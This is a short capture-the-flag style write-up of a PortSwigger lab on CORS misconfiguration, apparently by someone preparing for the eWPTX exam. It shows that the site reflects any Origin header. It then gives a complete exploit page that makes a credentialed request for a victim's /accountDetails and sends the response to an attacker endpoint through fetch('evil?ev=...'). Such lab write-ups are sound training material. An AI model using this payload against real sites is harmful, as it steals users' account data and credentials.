Hello Friends,

I’m Rem01x And I’m Currently Preparing For The eWPTX Exam So I Will Be Walking Through All PortSwigger Labs And Make Sure To Make Writeups For All Of Them.

Let’s Start Now.

Assume that we have this website.

Now, let’s login to our account

Now, let’s check the burp for the requests

Please notice the CORS Header in the response

Now, Let’s add the Origin Header and see what will happen.

Now, As observed the Origin Header value reflected back at the Allow Origin Header which mean that the website allow any Origin to access It’s resources

Now, Let’s write the exploitation script

<html>
    <body>
        <script>
            var xhr = new XMLHttpRequest();
            var url = "<https://0a5800d603ca62168811d97300d200fa.web-security-academy.net>";
            xhr.onreadystatechange = function(){
                if(xhr.readyState == XMLHttpRequest.DONE){
                    fetch("evil?ev=" + xhr.responseText)
                }
            }

            xhr.open('GET', url + "/accountDetails", true);
            xhr.withCredentials = true;
            xhr.send()

        </script>
    </body>
</html>

Now, Let’s go and send the exploit to the victim using the Exploit Server